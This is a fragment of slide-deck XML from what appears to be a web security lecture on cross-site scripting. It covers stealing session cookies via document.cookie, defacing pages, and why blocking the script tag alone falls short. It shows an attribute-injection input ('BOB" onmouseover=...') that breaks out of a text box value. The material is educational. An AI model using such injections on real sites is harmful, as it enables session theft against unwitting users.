        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6520550" x="6639650"/>
            <a:ext cy="0" cx="170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997" name="Shape 997"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4485975" x="2630050"/>
            <a:ext cy="9899" cx="104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98" name="Shape 998"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4312300" x="1399375"/>
            <a:ext cy="496199" cx="17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Static content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y="5074750" x="3886975"/>
            <a:ext cy="426599" cx="19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Secure Web Developer  Needed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1000" name="Shape 1000"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="999" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off y="5288049" x="2411574"/>
            <a:ext cy="597300" cx="147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01" name="Shape 1001"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5299475" x="956625"/>
            <a:ext cy="764100" cx="27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Dynamic (user supplied) content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1002" name="Shape 1002"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-2161738">
            <a:off y="3923076" x="6653171"/>
            <a:ext cy="446686" cx="315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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1003" name="Shape 10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02550" x="457200"/>
            <a:ext cy="1968500" cx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7" name="Shape 10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8" name="Shape 10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XSS Example 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1009" name="Shape 10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Anyone who views the ad posting will be hit by the XSS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Usually will be no visual indication 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victims will be 100% clueless they've just been hacked</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1010" name="Shape 10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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4198186" x="4356977"/>
            <a:ext cy="2213136" cx="1984932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sp>
        <p:nvSpPr>
          <p:cNvPr id="1012" name="Shape 1012"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5339575" x="7523200"/>
            <a:ext cy="535799" cx="952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pic>
        <p:nvPicPr>
          <p:cNvPr id="1013" name="Shape 10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52575" x="1310075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Shape 10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52575" x="3069049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Shape 10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5050" x="413975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Shape 10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5050" x="2203950"/>
            <a:ext cy="1816099" cx="1142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7" name="Shape 1017"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1012" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off y="4664574" x="1468900"/>
            <a:ext cy="942900" cx="60543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18" name="Shape 1018"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off y="4505849" x="3136275"/>
            <a:ext cy="1091700" cx="4356899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19" name="Shape 1019"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1012" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off y="5607474" x="2272900"/>
            <a:ext cy="436800" cx="52503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20" name="Shape 1020"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off y="5617400" x="4128674"/>
            <a:ext cy="625199" cx="33645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21" name="Shape 1021"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-2161738">
            <a:off y="4304076" x="6195971"/>
            <a:ext cy="446686" cx="315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www.fantasy-quidditch-league.com</a:t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5" name="Shape 10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6" name="Shape 10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what can attackers do with XSS?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Shape 10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Common attack is to steal session ID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 javascript: document.cookie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Rewrite any part of webpage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Defacing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Clickjacking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8" name="Shape 10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33167" x="3225556"/>
            <a:ext cy="1191664" cx="84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Shape 10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28530" x="3463725"/>
            <a:ext cy="2940344" cx="35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3" name="Shape 10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Defending against XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody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we just block the &lt;script&gt; tag and just be safe?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 still do XSS without &lt;script&gt;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9" name="Shape 10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0" name="Shape 10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3</a:t>
            </a:r>
          </a:p>
        </p:txBody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Imagine some social media site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Users sign up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enter username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password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etc..</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1042" name="Shape 10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43179" x="4491875"/>
            <a:ext cy="2735596" cx="41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Shape 1043"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4019525" x="476400"/>
            <a:ext cy="2391899" cx="378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Name: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>&lt;input type="text" id="fname"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value=""</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>/&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1044" name="Shape 1044"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off y="3612600" x="2828599"/>
            <a:ext cy="674999" cx="218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8" name="Shape 10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9" name="Shape 10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 3</a:t>
            </a:r>
          </a:p>
        </p:txBody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User types in "BOB" and this gets put in the text boxes value attribute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 that user's page, his name is stored in a text box</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1051" name="Shape 10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43179" x="4491875"/>
            <a:ext cy="2735596" cx="41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Shape 1052"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4019525" x="476400"/>
            <a:ext cy="2391899" cx="378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Name: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>&lt;input type="text" id="fname"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value="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BOB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>/&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1053" name="Shape 1053"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off y="3612600" x="2828599"/>
            <a:ext cy="674999" cx="218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54" name="Shape 1054"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3473650" x="5885375"/>
            <a:ext cy="297899" cx="16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8" name="Shape 10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9" name="Shape 10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XSS Example 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1060" name="Shape 10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Consider this input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1061" name="Shape 10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43179" x="4491875"/>
            <a:ext cy="2735596" cx="41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Shape 1062"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4019525" x="476400"/>
            <a:ext cy="2391899" cx="378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Name: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>&lt;input type="text" id="fname"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value="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>/&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1063" name="Shape 1063"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off y="3612600" x="2828599"/>
            <a:ext cy="674999" cx="218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64" name="Shape 1064"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3473650" x="5885375"/>
            <a:ext cy="297899" cx="29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BOB" onmouseover="/*evil*/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1065" name="Shape 10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02550" x="457200"/>
            <a:ext cy="1789856" cx="178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9" name="Shape 10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XSS Example 3</a:t>
            </a:r>
          </a:p>
        </p:txBody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Consider this input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1072" name="Shape 10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43179" x="4491875"/>
            <a:ext cy="2735596" cx="41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Shape 1073"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4019525" x="476400"/>
            <a:ext cy="2391899" cx="378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Name: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>&lt;input type="text" id="fname"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value=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BOB" onmouseover="/*evil*/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>/&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1074" name="Shape 1074"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off y="3612600" x="2828599"/>
            <a:ext cy="674999" cx="218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75" name="Shape 1075"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3473650" x="5885375"/>
            <a:ext cy="297899" cx="29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BOB" onmouseover="/*evil*/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1076" name="Shape 10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02550" x="457200"/>
            <a:ext cy="1789856" cx="178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0" name="Shape 10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1" name="Shape 10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XSS Example 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1082" name="Shape 10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Anyone who mouseover's the textbox containing the attackers name will be hit by XSS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victims will be 100% clueless they've just been hacked</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1083" name="Shape 10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37250" x="7175500"/>
            <a:ext cy="1803400" cx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Shape 1084"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4198186" x="4356977"/>
            <a:ext cy="2213136" cx="1984932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sp>
        <p:nvSpPr>
          <p:cNvPr id="1085" name="Shape 1085"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5339575" x="7523200"/>
            <a:ext cy="535799" cx="952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pic>
        <p:nvPicPr>
          <p:cNvPr id="1086" name="Shape 10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52575" x="1310075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Shape 10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52575" x="3069049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Shape 10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5050" x="413975"/>
            <a:ext cy="1816099" cx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Shape 10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5050" x="2203950"/>
            <a:ext cy="1816099" cx="1142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0" name="Shape 1090"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1085" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off y="4664574" x="1468900"/>
            <a:ext cy="942900" cx="60543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91" name="Shape 1091"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off y="4505849" x="3136275"/>
            <a:ext cy="1091700" cx="4356899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92" name="Shape 1092"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1085" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off y="5607474" x="2272900"/>
            <a:ext cy="436800" cx="52503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93" name="Shape 1093"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off y="5617400" x="4128674"/>
            <a:ext cy="625199" cx="33645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